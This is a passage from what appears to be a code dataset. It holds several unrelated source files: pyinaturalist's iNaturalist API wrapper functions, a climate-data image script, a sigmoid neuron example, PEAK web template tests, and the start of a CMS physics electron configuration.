on 2020-08-26 at Michener Dr, Regina, SK'\n\n .. admonition:: Example Response\n :class: toggle\n\n .. 
literalinclude:: ../sample_data/get_observations_node.py\n\n Returns:\n Response dict containing observation records\n \"\"\"\n validate_multiple_choice_param(params, 'order_by', NODE_OBS_ORDER_BY_PROPERTIES)\n r = node_api_get('observations', params=params)\n r.raise_for_status()\n\n observations = r.json()\n observations['results'] = convert_all_coordinates(observations['results'])\n observations['results'] = convert_all_timestamps(observations['results'])\n\n return observations\n\n\ndef get_all_observations(**params) -> List[JsonResponse]:\n \"\"\"Deprecated; use ``get_observations(page='all')`` instead\"\"\"\n msg = \"get_all_observations() is deprecated; please use get_observations(page='all') instead\"\n warn(DeprecationWarning(msg))\n return paginate_all(get_observations, method='id', **params)['results']\n\n\n@document_request_params([*docs._get_observations, docs._pagination])\n@add_paginate_all(method='page')\ndef get_observation_species_counts(**params) -> JsonResponse:\n \"\"\"Get all species (or other 'leaf taxa') associated with observations matching the search\n criteria, and the count of observations they are associated with.\n **Leaf taxa** are the leaves of the taxonomic tree, e.g., species, subspecies, variety, etc.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_species_counts\n\n Example:\n >>> response = get_observation_species_counts(user_login='my_username', quality_grade='research')\n >>> print(format_species_counts(response))\n [62060] Species: Palomena prasina (Green Shield Bug): 10\n [84804] Species: Graphosoma italicum (European Striped Shield Bug): 8\n [55727] Species: Cymbalaria muralis (Ivy-leaved toadflax): 3\n ...\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_species_counts.py\n\n Returns:\n Response dict containing taxon records with counts\n \"\"\"\n r = node_api_get(\n 'observations/species_counts',\n params=params,\n )\n r.raise_for_status()\n return r.json()\n\n\n@document_request_params([*docs._get_observations, docs._geojson_properties])\ndef get_geojson_observations(properties: List[str] = None, **params) -> JsonResponse:\n \"\"\"Get all observation results combined into a GeoJSON ``FeatureCollection``.\n By default this includes some basic observation properties as GeoJSON ``Feature`` properties.\n The ``properties`` argument can be used to override these defaults.\n\n Example:\n >>> get_geojson_observations(observation_id=16227955, properties=['photo_url'])\n\n .. admonition:: Example Response\n :class: toggle\n\n .. 
literalinclude:: ../sample_data/get_observations.geojson\n :language: JSON\n\n Returns:\n A ``FeatureCollection`` containing observation results as ``Feature`` dicts.\n \"\"\"\n params['mappable'] = True\n params['page'] = 'all'\n response = get_observations(**params)\n return as_geojson_feature_collection(\n response['results'],\n properties=properties if properties is not None else DEFAULT_OBSERVATION_ATTRS,\n )\n\n\n@document_request_params([*docs._get_observations, docs._pagination])\ndef get_observation_observers(**params) -> JsonResponse:\n \"\"\"Get observers of observations matching the search criteria and the count of\n observations and distinct taxa of rank species they have observed.\n\n Notes:\n * Options for ``order_by`` are 'observation_count' (default) or 'species_count'\n * This endpoint will only return up to 500 results\n * See this issue for more details: https://github.com/inaturalist/iNaturalistAPI/issues/235\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_observers\n\n Example:\n >>> response = get_observation_observers(place_id=72645, order_by='species_count')\n >>> print(format_users(response, align=True))\n [1566366 ] fossa1211\n [674557 ] schurchin\n [5813 ] fluffberger (Fluff Berger)\n\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_observers_ex_results.json\n :language: JSON\n\n Returns:\n Response dict of observers\n \"\"\"\n params.setdefault('per_page', 500)\n\n r = node_api_get(\n 'observations/observers',\n params=params,\n )\n r.raise_for_status()\n return r.json()\n\n\n@document_request_params([*docs._get_observations, docs._pagination])\ndef get_observation_identifiers(**params) -> JsonResponse:\n \"\"\"Get identifiers of observations matching the search criteria and the count of\n observations they have identified. By default, results are sorted by ID count in descending.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_identifiers\n\n Note: This endpoint will only return up to 500 results.\n\n Example:\n >>> response = get_observation_identifiers(place_id=72645)\n >>> print(format_users(response, align=True))\n [409010 ] jdoe42 (Jane Doe)\n [691216 ] jbrown252 (James Brown)\n [3959037 ] tnsparkleberry\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_identifiers_ex_results.json\n :language: JSON\n\n Returns:\n Response dict of identifiers\n \"\"\"\n params.setdefault('per_page', 500)\n\n r = node_api_get(\n 'observations/identifiers',\n params=params,\n )\n r.raise_for_status()\n return r.json()\n\n\n# Places\n# --------------------\n\n\ndef get_places_by_id(place_id: MultiInt, user_agent: str = None) -> JsonResponse:\n \"\"\"\n Get one or more places by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Places/get_places_id\n\n Example:\n >>> response = get_places_by_id([67591, 89191])\n >>> print(format_places(response))\n [89191] Conservation Area Riversdale\n [67591] Riversdale Beach\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_places_by_id.py\n\n Args:\n place_id: Get a place with this ID. 
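get_geojson_observations above forces params['page'] = 'all', leaning on the add_paginate_all wrapper that several of these endpoints share; the same switch is what replaces the deprecated get_all_observations() helper. A short usage sketch (the search filters are illustrative only):

from pyinaturalist.node_api import get_observations

# Fetch every page of matching observations in one call;
# equivalent to the deprecated get_all_observations()
response = get_observations(taxon_name='Danaus plexippus', year=2020, page='all')
print(response['total_results'], len(response['results']))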
Multiple values are allowed.\n\n Returns:\n Response dict containing place records\n \"\"\"\n r = node_api_get('places', ids=place_id, user_agent=user_agent)\n r.raise_for_status()\n\n # Convert coordinates to floats\n response = r.json()\n response['results'] = convert_all_coordinates(response['results'])\n return response\n\n\n@document_request_params([docs._bounding_box, docs._name])\ndef get_places_nearby(**params) -> JsonResponse:\n \"\"\"\n Given an bounding box, and an optional name query, return places nearby\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Places/get_places_nearby\n\n Example:\n >>> bounding_box = (150.0, -50.0, -149.999, -49.999)\n >>> response = get_places_nearby(*bounding_box)\n\n Response is split into standard (curated) places and community (non-curated) places:\n\n >>> print(len(response['results']['standard']))\n 10\n >>> print(len(response['results']['community']))\n 10\n\n Show basic info for all places in response:\n\n >>> print(format_places(response, align=True))\n Standard:\n [97394 ] North America\n [97395 ] Asia\n [97393 ] Oceania\n ...\n Community:\n [166719 ] Burgenland (accurate border)\n [11770 ] Mehedinti\n [119755 ] Mahurangi College\n ...\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_places_nearby.py\n\n Returns:\n Response dict containing place records, divided into 'standard' and 'community' places.\n \"\"\"\n r = node_api_get('places/nearby', params=params)\n r.raise_for_status()\n return convert_all_place_coordinates(r.json())\n\n\n@document_request_params([docs._search_query, docs._pagination])\n@add_paginate_all(method='autocomplete')\ndef get_places_autocomplete(q: str = None, **params) -> JsonResponse:\n \"\"\"Given a query string, get places with names starting with the search term\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Places/get_places_autocomplete\n\n **Note:** This endpoint accepts a ``per_page`` param, up to a max of 20 (default 10). Pages\n beyond the first page cannot be retrieved. Use ``page=all`` to attempt to retrieve additional\n results. See :py:func:`.paginate_autocomplete` for more info.\n\n Example:\n >>> response = get_places_autocomplete('Irkutsk')\n >>> print(format_places(response))\n [11803 ] Irkutsk\n [41854 ] Irkutskiy rayon\n [166186 ] Irkutsk Oblast - ADD\n [163077 ] Irkutsk agglomeration\n\n .. admonition:: Example Response\n :class: toggle\n\n .. 
literalinclude:: ../sample_data/get_places_autocomplete.py\n\n Args:\n q: Name must begin with this value\n\n Returns:\n Response dict containing place records\n \"\"\"\n r = node_api_get('places/autocomplete', params={'q': q, **params})\n r.raise_for_status()\n\n # Convert coordinates to floats\n response = r.json()\n response['results'] = convert_all_coordinates(response['results'])\n return response\n\n\n# Projects\n# --------------------\n\n\n@document_request_params([docs._projects_params, docs._pagination])\n@add_paginate_all(method='page')\ndef get_projects(**params) -> JsonResponse:\n \"\"\"Given zero to many of following parameters, get projects matching the search criteria.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Projects/get_projects\n\n Example:\n\n Search for projects about invasive species within 400km of Vancouver, BC:\n\n >>> response = get_projects(\n >>> q='invasive',\n >>> lat=49.27,\n >>> lng=-123.08,\n >>> radius=400,\n >>> order_by='distance',\n >>> )\n\n Show basic info for projects in response:\n\n >>> print(format_projects(response, align=True))\n [8291 ] PNW Invasive Plant EDDR\n [19200 ] King County (WA) Noxious and Invasive Weeds\n [102925 ] Keechelus/Kachess Invasive Plants\n ...\n\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_projects.py\n\n Returns:\n Response dict containing project records\n \"\"\"\n validate_multiple_choice_param(params, 'order_by', PROJECT_ORDER_BY_PROPERTIES)\n r = node_api_get('projects', params=params)\n r.raise_for_status()\n\n response = r.json()\n response['results'] = convert_all_coordinates(response['results'])\n response['results'] = convert_all_timestamps(response['results'])\n return response\n\n\ndef get_projects_by_id(\n project_id: MultiInt, rule_details: bool = None, user_agent: str = None\n) -> JsonResponse:\n \"\"\"Get one or more projects by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Projects/get_projects_id\n\n Example:\n\n >>> response = get_projects_by_id([8348, 6432])\n >>> print(format_projects(response))\n [8348] Tucson High Native and Invasive Species Inventory\n [6432] CBWN Invasive Plants\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_projects_by_id.py\n\n Args:\n project_id: Get projects with this ID. Multiple values are allowed.\n rule_details: Return more information about project rules, for example return a full taxon\n object instead of simply an ID\n\n Returns:\n Response dict containing project records\n \"\"\"\n r = node_api_get(\n 'projects',\n ids=project_id,\n params={'rule_details': rule_details},\n user_agent=user_agent,\n )\n r.raise_for_status()\n\n response = r.json()\n response['results'] = convert_all_coordinates(response['results'])\n response['results'] = convert_all_timestamps(response['results'])\n return response\n\n\n# Taxa\n# --------------------\n\n\n@document_request_params([docs._taxon_params, docs._taxon_id_params, docs._pagination])\n@add_paginate_all(method='page')\ndef get_taxa(**params) -> JsonResponse:\n \"\"\"Given zero to many of following parameters, get taxa matching the search criteria.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Taxa/get_taxa\n\n Example:\n\n >>> response = get_taxa(q='vespi', rank=['genus', 'family'])\n >>> print(format_taxa(response))\n [52747] Family: Vespidae (Hornets, Paper Wasps, Potter Wasps, and Allies)\n [92786] Genus: Vespicula\n [646195] Genus: Vespiodes\n ...\n\n .. 
admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_taxa.json\n :language: JSON\n\n Returns:\n Response dict containing taxon records\n \"\"\"\n params = translate_rank_range(params)\n r = node_api_get('taxa', params=params)\n r.raise_for_status()\n\n taxa = r.json()\n taxa['results'] = convert_all_timestamps(taxa['results'])\n return taxa\n\n\ndef get_taxa_by_id(taxon_id: MultiInt, user_agent: str = None) -> JsonResponse:\n \"\"\"Get one or more taxa by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Taxa/get_taxa_id\n\n Example:\n\n >>> response = get_taxa_by_id(343248)\n >>> basic_fields = ['preferred_common_name', 'observations_count', 'wikipedia_url', 'wikipedia_summary']\n >>> print({f: response['results'][0][f] for f in basic_fields})\n {\n 'preferred_common_name': 'Paper Wasps',\n 'observations_count': 69728,\n 'wikipedia_url': 'http://en.wikipedia.org/wiki/Polistinae',\n 'wikipedia_summary': 'The Polistinae are eusocial wasps closely related to yellow jackets...',\n }\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_taxa_by_id.py\n\n Args:\n taxon_id: Get taxa with this ID. Multiple values are allowed.\n\n Returns:\n Response dict containing taxon records\n \"\"\"\n r = node_api_get('taxa', ids=taxon_id, user_agent=user_agent)\n r.raise_for_status()\n\n taxa = r.json()\n taxa['results'] = convert_all_timestamps(taxa['results'])\n return taxa\n\n\n@document_request_params([docs._taxon_params])\ndef get_taxa_autocomplete(**params) -> JsonResponse:\n \"\"\"Given a query string, return taxa with names starting with the search term\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Taxa/get_taxa_autocomplete\n\n **Note:** There appears to currently be a bug in the API that causes ``per_page`` to not have\n any effect.\n\n Example:\n\n Get just the name of the first matching taxon:\n\n >>> response = get_taxa_autocomplete(q='vespi')\n >>> print(response['results'][0]['name'])\n 'Vespidae'\n\n Get basic info for taxa in response:\n\n >>> print(format_taxa(response, align=True))\n [52747 ] Family: Vespidae (Hornets, Paper Wasps, Potter Wasps, and Allies)\n [84738 ] Subfamily: Vespinae (Hornets and Yellowjackets)\n [131878 ] Species: Nicrophorus vespillo (Vespillo Burying Beetle)\n\n If you get unexpected matches, the search likely matched a synonym, either in the form of a\n common name or an alternative classification. Check the ``matched_term`` property for more\n info. For example:\n\n >>> first_result = get_taxa_autocomplete(q='zygoca')['results'][0]\n >>> first_result[\"name\"]\n \"Schlumbergera truncata\" # This doesn't look like our search term!\n >>> first_result[\"matched_term\"]\n \"Zygocactus truncatus\" # ...Because it matched an older synonym for Schlumbergera\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_taxa_autocomplete.py\n\n .. admonition:: Example Response (formatted)\n :class: toggle\n\n .. 
literalinclude:: ../sample_data/get_taxa_autocomplete_minified.py\n\n Returns:\n Response dict containing taxon records\n \"\"\"\n params = translate_rank_range(params)\n r = node_api_get('taxa/autocomplete', params=params)\n r.raise_for_status()\n return r.json()\n\n\n# Users\n# --------------------\n\n\ndef get_user_by_id(user_id: int, user_agent: str = None) -> JsonResponse:\n \"\"\"Get a user by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Users/get_users_id\n\n Args:\n user_id: Get the user with this ID. Only a single ID is allowed per request.\n\n Example:\n\n >>> response = get_user_by_id(123456)\n >>> print(format_users(response))\n [1234] my_username\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_user_by_id.py\n\n Returns:\n Response dict containing user record\n \"\"\"\n r = node_api_get('users', ids=[user_id], user_agent=user_agent)\n r.raise_for_status()\n results = r.json()['results']\n if not results:\n return {}\n return convert_generic_timestamps(results[0])\n\n\n@document_request_params([docs._search_query, docs._project_id, docs._pagination])\ndef get_users_autocomplete(q: str, **params) -> JsonResponse:\n \"\"\"Given a query string, return users with names or logins starting with the search term\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Users/get_users_autocomplete\n\n Note: Pagination is supported; default page size is 6, and max is 100.\n\n Example:\n\n >>> response = get_taxa_autocomplete(q='my_userna')\n >>> print(format_users(response))\n [1234] my_username\n [12345] my_username_2\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_users_autocomplete.py\n\n Returns:\n Response dict containing user records\n \"\"\"\n r = node_api_get('users/autocomplete', params={'q': q, **params})\n r.raise_for_status()\n users = r.json()\n users['results'] = convert_all_timestamps(users['results'])\n return users\n\n\n# Main Search\n# --------------------\n\n\n@document_request_params([docs._search_params, docs._pagination])\ndef search(q: str, **params) -> JsonResponse:\n \"\"\"A unified search endpoint for places, projects, taxa, and/or users\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Search/get_search\n\n Example:\n\n >>> response = search(q='odonat')\n >>> print(format_search_results(response, align=True))\n [Taxon ] [47792 ] Order: Odonata (Dragonflies and Damselflies)\n [Place ] [113562 ] Odonates of Peninsular India and Sri Lanka\n [Project] [9978 ] Ohio Dragonfly Survey (Ohio Odonata Survey)\n [User ] [113886 ] odonatanb (Gilles Belliveau)\n\n\n .. admonition:: Example Response\n :class: toggle\n\n .. 
literalinclude:: ../sample_data/get_search.py\n\n    Returns:\n        Response dict containing search results\n    \"\"\"\n    r = node_api_get('search', params={'q': q, **params})\n    r.raise_for_status()\n    search_results = r.json()\n    search_results['results'] = convert_all_timestamps(search_results['results'])\n    search_results['results'] = convert_all_coordinates(search_results['results'])\n    return search_results\n","sub_path":"pyinaturalist/node_api.py","file_name":"node_api.py","file_ext":"py","file_size_in_byte":30616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"138944218","text":"from PIL import Image\nfrom PIL import ImageOps\nimport csv\n \ncsvfile = open('/Users/maliokodis/NASANEOdata.csv', 'rU') \nreader = csv.reader(csvfile)\nstringRead = []\nfor row in reader:\n    stringRead.append(row)\ncsvfile.close()\n\nfinalRead = []\nfor stringRow in stringRead:\n    numRow = []\n    for stringElem in stringRow:\n        val = float(stringElem)\n        numRow.append(val)\n    finalRead.append(numRow)\n\nnumRows = len(finalRead)\nnumCols = len(finalRead[0])\nimg = Image.new('RGB', (numRows, numCols), \"black\")\npixels = img.load()\n\nfor i in range(img.size[0]):\n    for j in range(img.size[1]):\n        if finalRead[i][j] <= -20:\n            pixels[i,j] = (10, 0, 0)\n        elif finalRead[i][j] <= 100:\n            pixels[i,j] = (0, 0, 225)\n        else:\n            pixels[i,j] = (0, 225, 0)\n\nImageOps.mirror(img.rotate(270)).show()","sub_path":"DataViz_Files/Code/codingClimate.py","file_name":"codingClimate.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"321463318","text":"\"\"\"\nex04_sigmoid.py\nsigmoid function: y = 1 / (1 + exp(-x))\nproof that dy/dx = y(1 - y)\nimplement a sigmoid neuron (forward, backward)\n\"\"\"\nimport numpy as np\n\nfrom ch03.ex01 import sigmoid\n\n\nclass Sigmoid:\n    def __init__(self):\n        # field for storing the return value y of the forward method\n        self.y = None\n\n    def forward(self, x):\n        y = 1 / (1 + np.exp(-x))\n        self.y = y\n        return y\n\n    def backward(self, dout):\n        return dout * self.y * (1 - self.y)\n\n\nif __name__ == '__main__':\n    # create a Sigmoid neuron\n    sigmoid_gate = Sigmoid()\n    # return value (forward) of the sigmoid function at x = 0\n    y = sigmoid_gate.forward(x=0.0)\n    print('y =', y)  # sigmoid(0) = 0.5 when x = 0\n\n    # gradient of sigmoid at x = 0 (slope of the tangent line)\n    dx = sigmoid_gate.backward(dout=1.)\n    print('dx =', dx)\n\n    # compute [f(x + h) - f(x)]/h for a very small h\n    h = 1e-7\n    dx2 = (sigmoid(0. + h) - sigmoid(0.)) / h\n    print('dx2 =', dx2)\n\n","sub_path":"ch05/ex04_sigmoid.py","file_name":"ex04_sigmoid.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"653031062","text":"\"\"\"Template tests\n\nTODO\n\n  - Mixed namespaces\n\n  - DOMlet property redefinition within a component\n\n  - Security used\n\n  - DOCTYPE\n\"\"\"\n\nfrom unittest import TestCase, makeSuite, TestSuite\nfrom peak.api import *\nfrom peak.tests import testRoot\nfrom cStringIO import StringIO\nimport peak.web.templates as pwt\nfrom urllib import quote\n\nclass TestApp(web.Location):\n\n    binding.metadata(\n        foo = security.Anybody,\n        bar = security.Anybody,\n        someXML = security.Anybody,\n        baz = security.Nobody,\n    )\n\n    foo = \"The title (with <xml/> & such in it)\"\n    baz = \"can't touch this!\"\n    bar = 1,2,3\n\n    someXML = \"
<ul><li>This has &lt;xml/&gt; in it</li></ul>\"\n\n    show = binding.Require(\n        \"Template to dump this out with\",\n        [security.Anybody]\n    )\n\n\nclass BasicTest(TestCase):\n\n    template = \"pkgfile:peak.web.tests/template1.pwt\"\n\n    rendered = \"\"\"\n<html><head><title>Template test: The title (with &lt;xml/&gt; &amp; such in it)</title></head>\n<body>\n<h1>The title (with &lt;xml/&gt; &amp; such in it)</h1>\n<ul><li>1</li><li>2</li><li>3</li></ul>\n<ul><li>This has &lt;xml/&gt; in it</li></ul>\n<ul><li>This has &lt;xml/&gt; in it</li></ul>\n</body></html>
    \n\n\"\"\"\n\n def setUp(self):\n r = testRoot()\n app = TestApp(r, show = self.mkTemplate())\n self.policy = web.TestPolicy(app)\n\n def mkTemplate(self):\n return config.processXML(\n web.TEMPLATE_SCHEMA(testRoot()), self.template,\n pwt_document=web.TemplateDocument(testRoot())\n )\n\n def render(self):\n return self.policy.simpleTraverse('show')\n\n def testRendering(self):\n self.assertEqual(self.render(),self.rendered)\n\n\n\n\n\n\n\n\n\n\nclass NSTest(BasicTest):\n\n template = \"data:,\"+quote(\"\"\"\n
<body>\n<h1 content:text=\"foo\">Title Goes Here</h1>\n<ul content:list=\"bar\">\n  <li this:is=\"listItem\"></li>\n</ul>\n</body>\n\"\"\")\n\n    rendered = \"\"\"\n<body>\n<h1>The title (with &lt;xml/&gt; &amp; such in it)</h1>\n<ul><li>1</li><li>2</li><li>3</li></ul>\n</body>
    \n\"\"\"\n\n\nclass NSTest2(NSTest):\n\n template = \"data:,\"+quote(\"\"\"\n
<body>\n<h1 content:text=\"foo\">Title Goes Here</h1>\n<ul content:list=\"bar\">\n  <li>foo</li>\n  <li this:is=\"listItem\"></li>\n</ul>\n</body>\n\"\"\")\n\nclass ListHeaderFooterTest(BasicTest):\n    template = \"data:,\"+quote(\"\"\"
<ul content:list=\"bar\"><li this:is=\"header\">Header</li>\n<li this:is=\"footer\">Footer</li>\n<li></li></ul>\"\"\")\n\n    rendered = \"<ul><li>Header</li><li>1</li><li>2</li><li>3</li>\" \\\n        \"<li>Footer</li></ul>
    \"\n\n\n\n\n\n\n\n\n\nclass MiscTests(TestCase):\n\n def setUp(self):\n self.app = TestApp(testRoot())\n self.policy = web.TestPolicy(self.app)\n self.ctx = self.policy.newContext()\n\n def testParameters(self):\n\n class MockTemplate:\n protocols.advise(instancesProvide=[web.IDOMletRenderable])\n renderCt = 0\n def renderFor(_self,ctx,state):\n self.assert_(ctx is self.ctx)\n self.assertEqual(state,123)\n _self.renderCt+=1\n\n t = MockTemplate()\n p = pwt.Parameters(self.ctx,{'t':t, 'p':u'bar', 'd':123})\n ctx = self.ctx.childContext('xyz',p)\n c2 = ctx.traverseName('t')\n\n # Test a second time to ensure that result is cached\n c2 = ctx.traverseName('t')\n\n # It should render with the original context\n c2.current.renderFor(c2,123)\n\n # and the mock 'renderFor' should have been called exactly once:\n self.assertEqual(t.renderCt, 1)\n\n # Paths should be traversed from the start point\n c2 = ctx.traverseName('p')\n self.assertEqual(c2.current, (1,2,3))\n\n # And data should just be returned\n c2 = ctx.traverseName('d')\n self.assertEqual(c2.current, (123))\n\n\n\n def renderDoc(self,doc):\n ctx = self.ctx.childContext('x',doc)\n ctx.shift() # get rid of 'index.html'\n return ctx.renderHTTP()\n\n def renderFragment(self,doc):\n ctx = self.ctx.childContext('x',doc)\n ctx.shift() # get rid of 'index.html'\n data = []\n doc.renderFor(ctx, pwt.DOMletState(doc, write=data.append))\n return ''.join(data)\n\n def testContentType(self):\n s,h,b = self.renderDoc(\n pwt.TemplateDocument(\n self.app,\n content_type='text/plain', params={'page-layout':'/default'}\n )\n )\n self.assertEqual(h,[('Content-type','text/plain')])\n\n\n def testRenderFragment(self):\n doc = pwt.TemplateDocument(self.app,params={'page-layout':'/default'})\n doc.addChild(pwt.Literal(doc,xml=\"foo\"))\n doc.fragment = pwt.Literal(doc,xml=\"bar\")\n doc.addChild(doc.fragment)\n s,h,b = self.renderDoc(doc)\n self.assertEqual(''.join(b), \"foobar\")\n self.assertEqual(self.renderFragment(doc), \"bar\")\n\n def testRenderPage(self):\n doc = pwt.TemplateDocument(self.app)\n doc.addChild(pwt.Literal(doc,xml=\"foo\"))\n doc.page = pwt.Literal(doc,xml=\"bar\")\n doc.addChild(doc.page)\n s,h,b = self.renderDoc(doc)\n self.assertEqual(''.join(b), \"bar\")\n\n\n\n def testNonRendering(self):\n doc = pwt.TemplateDocument(self.app,fragment=None)\n self.assertRaises(TypeError,self.renderFragment,doc)\n doc = pwt.TemplateDocument(self.app,page=None)\n self.assertRaises(web.UnsupportedMethod,self.renderDoc,doc)\n\n\n def testUses(self):\n for kind in pwt.Uses, pwt.Unless:\n for path in \"spammity-whiz\",\"foo\":\n doc = pwt.TemplateDocument(self.app)\n uses = kind(doc,dataSpec=path,tagName=None,attribItems=())\n uses.addChild(pwt.Literal(uses,xml=\"foo\"))\n doc.addChild(uses)\n txt = self.renderFragment(doc)\n if (path==\"foo\") == (kind is pwt.Uses):\n self.assertEqual(txt, \"foo\")\n else:\n self.assertEqual(txt, \"\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass ParserTests(TestCase):\n\n def setUp(self,**kw):\n self.xml_parser = config.XMLParser(\n web.TEMPLATE_SCHEMA(testRoot()),\n pwt_document = web.TemplateDocument(testRoot()),\n **kw\n )\n self.parse = self.xml_parser.parse\n self.nparser = nparser = self.xml_parser.makeParser()\n self.startElement = nparser.startElement\n self.endElement = nparser.endElement\n nparser._beforeParsing(self.xml_parser.parseFunctions())\n self.finish = nparser._afterParsing\n self.policy = web.TestPolicy(TestApp(testRoot()))\n\n def testInvalidArgs(self):\n 
self.startElement('ul',['content:list','bar'])\n\n # Unrecognized argument for 'list'\n self.startElement('li',['this:is','invalid'])\n self.assertRaises(SyntaxError,self.endElement)\n\n # Multiple 'header' definitions\n self.startElement('li',['this:is','header'])\n self.endElement()\n self.startElement('li',['this:is','header'])\n self.assertRaises(SyntaxError,self.endElement)\n\n\n\n\n\n\n\n\n\n\n\n\n\n def testLayoutArgs(self):\n doc = self.parse(\"data:,\"+quote(\n \"\"\"\"\"\"))\n\n self.assertEqual(doc.content_type,\"text/plain\")\n self.assert_(isinstance(doc.content_type,str))\n self.assert_(isinstance(doc.page,pwt.Replace))\n self.assert_(isinstance(doc.fragment,pwt.Replace))\n\n page = doc.params['page']\n fragment = doc.params['fragment']\n self.assert_(fragment.getParentComponent() is page)\n\n # We used 'layout' options, so page/frag attrs will be driven by those\n self.assert_(doc.fragment.getParentComponent() is doc)\n self.assert_(doc.page.getParentComponent() is doc)\n\n\n def testNonLayoutArgs(self):\n doc = self.parse(\"data:,\"+quote(\n \"\"\"\"\"\"))\n self.assert_(isinstance(doc.page,pwt.Element))\n self.assert_(isinstance(doc.fragment,pwt.Element))\n\n # We used non-layout options, so page/frag attrs will be related\n self.assert_(doc.fragment.getParentComponent() is doc.page)\n self.assert_(doc.page.getParentComponent() is doc)\n\n\n def testDefaultLayoutArgs(self):\n doc = self.parse(\"data:,\"+quote(\"\"\"\"\"\"))\n self.assert_(doc.fragment)\n self.assert_(not doc.page)\n\n\n\n\n\nTestClasses = (\n MiscTests, ParserTests, BasicTest, NSTest, NSTest2, ListHeaderFooterTest\n)\n\ndef test_suite():\n return TestSuite([makeSuite(t,'test') for t in TestClasses])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PEAK-0.5a4dev_r2085/src/peak/web/tests/test_templates.py","file_name":"test_templates.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"199743210","text":"import FWCore.ParameterSet.Config as cms\n\nelectronMaker = cms.EDProducer(\n \"ElectronMaker\",\n aliasPrefix = cms.untracked.string(\"els\"),\n # Electron collection\n electronsInputTag = cms.InputTag(\"gsfElectrons\"),\n # Beamspot\n beamSpotInputTag = cms.InputTag(\"beamSpotMaker\"),\n # reco Track collection\n trksInputTag = cms.InputTag(\"generalTracks\"),\n gsftracksInputTag = cms.InputTag(\"electronGsfTracks\"),\n # pfCandidate and Vertex collection\n pfCandsInputTag = cms.InputTag(\"particleFlow\"),\n vtxInputTag = cms.InputTag(\"offlinePrimaryVertices\"),\n\n # isolations from external\n pfIsoCharged03InputTag = cms.InputTag(\"elPFIsoValueCharged03PFIdPFIso\"),\n pfIsoGamma03InputTag = cms.InputTag(\"elPFIsoValueGamma03PFIdPFIso\"),\n pfIsoNeutral03InputTag = cms.InputTag(\"elPFIsoValueNeutral03PFIdPFIso\"),\n pfIsoCharged04InputTag = cms.InputTag(\"elPFIsoValueCharged04PFIdPFIso\"),\n pfIsoGamma04InputTag = cms.InputTag(\"elPFIsoValueGamma04PFIdPFIso\"),\n pfIsoNeutral04InputTag = cms.InputTag(\"elPFIsoValueNeutral04PFIdPFIso\"),\n\n # reco conversions\n recoConversionInputTag = cms.InputTag(\"allConversions\"),\n # egamma ID\n eidLHTag = cms.InputTag(\"egammaIDLikelihood\"),\n cms2scsseeddetidInputTag = cms.InputTag(\"scMaker\"),\n #conversion stuff \n minAbsDist = cms.double(0.02), \n minAbsDcot = cms.double(0.02),\n minSharedFractionOfHits = cms.double(0.45),\n rhoInputTag = cms.InputTag(\"fastJetMaker\", \"evtrho\"),\n beamSpotTag = 
